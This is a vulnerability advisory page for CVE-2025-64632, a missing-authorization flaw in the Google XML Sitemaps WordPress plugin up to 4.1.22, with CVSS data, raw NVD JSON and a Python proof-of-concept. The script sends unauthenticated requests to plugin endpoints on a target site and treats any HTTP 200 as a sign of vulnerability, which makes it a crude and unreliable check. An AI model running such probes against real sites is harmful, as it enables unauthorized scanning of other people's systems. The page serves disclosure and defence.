Security Vulnerability Report
中文
CVE-2025-64632 CVSS 5.3 MEDIUM

CVE-2025-64632

Published: 2025-12-16 09:15:55
Last Modified: 2026-04-27 16:16:43

Description

Missing Authorization vulnerability in Auctollo Google XML Sitemaps google-sitemap-generator allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Google XML Sitemaps: from n/a through <= 4.1.22.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

google-sitemap-generator <= 4.1.22

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-64632 PoC - Missing Authorization in Google XML Sitemaps # Target: WordPress site with google-sitemap-generator plugin <= 4.1.22 target_url = "http://target-wordpress-site.com" # Check if the plugin is installed and accessible plugin_paths = [ "/wp-content/plugins/google-sitemap-generator/", "/wp-content/plugins/google-sitemap-generator/sitemap-core.php", "/wp-admin/admin.php?page=sm_browse" ] def check_vulnerability(): """Check if the target is vulnerable to CVE-2025-64632""" # Test unauthenticated access to plugin endpoints vulnerable_endpoints = [ "/wp-admin/admin-ajax.php?action=sm_ajax_call", "/wp-content/plugins/google-sitemap-generator/sitemap-core.php" ] results = [] for endpoint in vulnerable_endpoints: url = target_url + endpoint try: response = requests.get(url, timeout=10) # Check if we can access admin functionality without auth if response.status_code == 200: results.append(f"[+] Potentially vulnerable: {url}") else: results.append(f"[-] Not vulnerable or not found: {url}") except requests.RequestException as e: results.append(f"[!] Error accessing {url}: {str(e)}") return results if __name__ == "__main__": print("CVE-2025-64632 - Google XML Sitemaps Authorization Bypass") print("=" * 60) results = check_vulnerability() for result in results: print(result)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64632", "sourceIdentifier": "[email protected]", "published": "2025-12-16T09:15:55.467", "lastModified": "2026-04-27T16:16:42.753", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Auctollo Google XML Sitemaps google-sitemap-generator allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Google XML Sitemaps: from n/a through <= 4.1.22."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/google-sitemap-generator/vulnerability/wordpress-google-xml-sitemaps-plugin-4-1-21-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}